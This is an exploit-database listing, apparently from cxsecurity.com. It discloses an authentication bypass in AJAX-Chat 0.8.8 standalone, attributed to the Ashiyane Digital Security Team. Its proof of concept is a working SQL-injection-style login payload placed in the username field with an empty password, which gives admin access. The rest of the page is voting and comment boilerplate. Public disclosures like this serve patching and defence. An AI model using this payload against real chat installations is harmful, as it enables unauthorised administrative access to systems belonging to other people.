AJAX-Chat-0.8.8-standalone - Authentication Bypass

2018.07.11
ir Ashiyane Digital Security Team (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|===============================================| | In The Name Of GOD |===============================================| | Exploit Title: AJAX-Chat-0.8.8-standalone - Authentication Bypass | Dork: N/A | Date: 2018-07-10 | Exploit Author: Ashiyane Digital Security TEAM | Vendor Homepage: https://frug.github.io/AJAX-Chat/ | Software Link : https://github.com/Frug/AJAX-Chat/archive/0.8.8-standalone.zip | Version: v0.8.8 | Category: Web apps | CVE: N/A |===============================================| | Description: | With this exploit,attacker can bypass admin login authentication. | |===============================================| | | Proof of Concept : | | http://localhost/PATH/chat/index.php | | Username : admin or 'or' '=' | Password : |===============================================|


See this note in RAW Version
Vote for this issue:
70%
30%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top